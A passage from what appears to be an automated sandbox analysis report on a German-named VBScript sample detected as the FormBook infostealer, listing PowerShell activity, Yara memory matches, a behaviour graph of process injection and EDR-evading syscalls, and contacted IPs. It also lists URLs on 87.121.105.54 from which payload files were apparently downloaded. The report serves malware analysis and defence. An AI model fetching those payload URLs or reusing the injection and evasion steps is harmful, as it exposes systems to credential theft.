Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436288 Sample: Zahlungsbeleg 202405029058.vbs Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 65 google.com 2->65 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus detection for URL or domain 2->79 81 Yara detected FormBook 2->81 83 3 other signatures 2->83 13 wscript.exe 1 2->13         started        signatures3 process4 signatures5 97 VBScript performs obfuscated calls to suspicious functions 13->97 99 Suspicious powershell command line found 13->99 101 Wscript starts Powershell (via cmd or directly) 13->101 103 4 other signatures 13->103 16 powershell.exe 14 19 13->16         started        20 PING.EXE 1 13->20         started        22 cmd.exe 1 13->22         started        24 PING.EXE 1 13->24         started        process6 dnsIp7 61 87.121.105.54, 49731, 49737, 80 NET1-ASBG Bulgaria 16->61 67 Suspicious powershell command line found 16->67 69 Very long command line found 16->69 71 Found suspicious powershell code related to unpacking or dynamic code loading 16->71 26 powershell.exe 17 16->26         started        29 conhost.exe 16->29         started        31 cmd.exe 1 16->31         started        63 google.com 142.250.72.174 GOOGLEUS United States 20->63 33 conhost.exe 20->33         started        35 conhost.exe 22->35         started        37 conhost.exe 24->37         started        signatures8 process9 signatures10 89 Writes to foreign memory regions 26->89 91 Found suspicious powershell code related to unpacking or dynamic code loading 26->91 39 wab.exe 2 7 26->39         started        42 cmd.exe 1 26->42         started        process11 signatures12 85 Maps a DLL or memory area into another process 39->85 44 kOAlByYcnQDKnTplLRjSHzGyPq.exe 39->44 injected 47 cmd.exe 1 39->47         started        process13 signatures14 93 Maps a DLL or memory area into another process 44->93 95 Found direct / indirect Syscall (likely to bypass EDR) 44->95 49 clip.exe 44->49         started        52 conhost.exe 47->52         started        54 reg.exe 1 1 47->54         started        process15 signatures16 73 Maps a DLL or memory area into another process 49->73 75 Queues an APC in another process (thread injection) 49->75 56 kOAlByYcnQDKnTplLRjSHzGyPq.exe 49->56 injected process17 signatures18 87 Found direct / indirect Syscall (likely to bypass EDR) 56->87 59 WerFault.exe 21 56->59         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.72.174
 google.com United States
15169 GOOGLEUS false
87.121.105.54
 unknown Bulgaria
43561 NET1-ASBG false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
google.com 142.250.72.174 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://87.121.105.54/Oxaluria209.smi false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://87.121.105.54/vKdsOriqv105.bin false
  • Avira URL Cloud: safe
 unknown